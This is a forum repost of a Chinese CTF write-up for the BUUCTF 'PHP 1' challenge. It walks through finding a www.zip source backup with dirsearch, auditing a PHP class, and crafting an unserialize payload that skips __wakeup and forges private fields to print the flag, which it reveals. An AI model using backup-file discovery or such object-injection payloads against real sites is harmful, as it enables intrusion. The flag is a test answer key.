首页 › PHP论坛 › BUUCTF-[极客大挑战 2019]PHP 1

时间非礼了梦想 發表於 2020-10-11 22:13:00

BUUCTF-[极客大挑战 2019]PHP 1

<p>打开题目，我们就看到这个猫，先是用鼠标晃了晃，还跟着我的光标摇脑袋。我是来做题的。前端工程师肯定也对这个下功夫了。</p>
<p><img src="https://img2020.cnblogs.com/blog/2075370/202010/2075370-20201011214338301-1675938796.png" alt="" width="715" height="320" loading="lazy"></p>
<p>&nbsp;</p>
<p>&nbsp;有一个良好的备份网站的习惯很好啊，我们首先根据题目的提示，用dirsearch扫目录</p>
<p>如果没有这个工具的可以去github上下载就可以了。</p>
<p>最终，我们扫到这个备份文件</p>
<p><img src="https://img2020.cnblogs.com/blog/2075370/202010/2075370-20201011214822942-482545392.png" alt="" width="1039" height="543" loading="lazy"></p>
<p>&nbsp;</p>
<p>&nbsp;www.zip这个备份文件</p>
<p>于是，我们直接回到网页，然后拼接www.zip于是我们就下载了源码，解压之后，我们看到了这些</p>
<p><img src="https://img2020.cnblogs.com/blog/2075370/202010/2075370-20201011214954666-1706005419.png" alt="" width="767" height="619" loading="lazy"></p>
<p>&nbsp;</p>
<p>&nbsp;打开flag.php以为得到flag结果是个假的。</p>
<p>于是我们打开index.php</p>
<p><img src="https://img2020.cnblogs.com/blog/2075370/202010/2075370-20201011215108308-1800125328.png" alt="" loading="lazy"></p>
<p>&nbsp;</p>
<p>&nbsp;发现一段php代码，包含class.php文件，然后get方式传入一个select参数，并且将结果反序列化</p>
<p>然后，我们再打开class.php文件，然后又发现了一段代码，审计一下</p>
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;">&lt;?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
      $this-&gt;username = $username;
      $this-&gt;password = $password;
    }

    function __wakeup(){
      $this-&gt;username = 'guest';
    }

    function __destruct(){
      if ($this-&gt;password != 100) {
            echo "&lt;/br&gt;NO!!!hacker!!!&lt;/br&gt;";
            echo "You name is: ";
            echo $this-&gt;username;echo "&lt;/br&gt;";
            echo "You password is: ";
            echo $this-&gt;password;echo "&lt;/br&gt;";
            die();
      }
      if ($this-&gt;username === 'admin') {
            global $flag;
            echo $flag;
      }else{
            echo "&lt;/br&gt;hello my friend~~&lt;/br&gt;sorry i can't give you the flag!";
            die();

            
      }
    }
}
?&gt;
</pre>
</div>
<p>　　根据代码的意思，我们可以发现如果username=admin&nbsp; &nbsp; &nbsp; password=100然后我们再执行__destruct()时可以获得flag</p>
<p>于是构造反序列化</p>
<div class="cnblogs_Highlighter">
<pre class="brush:php;gutter:true;">&lt;?php

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
      $this-&gt;username = $username;
      $this-&gt;password = $password;
    }
}
$a = new Name('admin', 100);
var_dump(serialize($a));

?&gt;
</pre>
</div>
<p>　　保存，然后获得序列化后的字符串：O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}</p>
<p>于是我们将参数值给select，这时候问题来了，在反序列化的时候会首先执行<code>__wakeup()</code>魔术方法，但是这个方法会把我们</p>
<p>的username重新赋值，所以我们要考虑的就是怎么跳过<code>__wakeup()</code>，而去执行<code>__destruct</code></p>
<p>在反序列化时，当前属性个数大于实际属性个数时，就会跳过__wakeup()，去执行__destruct</p>
<p>于是我们这样构造pyload:</p>
<p>?select=O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}</p>
<p>然后我们又意识到，这个变量时private</p>
<p>private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字</p>
<p>段名在序列化时，类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度</p>
<p>于是我们在构造一回pyload:</p>
<p>?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}</p>
<p><img src="https://img2020.cnblogs.com/blog/2075370/202010/2075370-20201011221208235-264436272.png" alt="" loading="lazy"></p>
<p>&nbsp;</p>
<p>&nbsp;出来flag:flag{32beb1fb-5e2e-4cd5-87c8-a0e75f291395}</p><br><br>
来源：https://www.cnblogs.com/junlebao/p/13799762.html

查看完整版本: BUUCTF-[极客大挑战 2019]PHP 1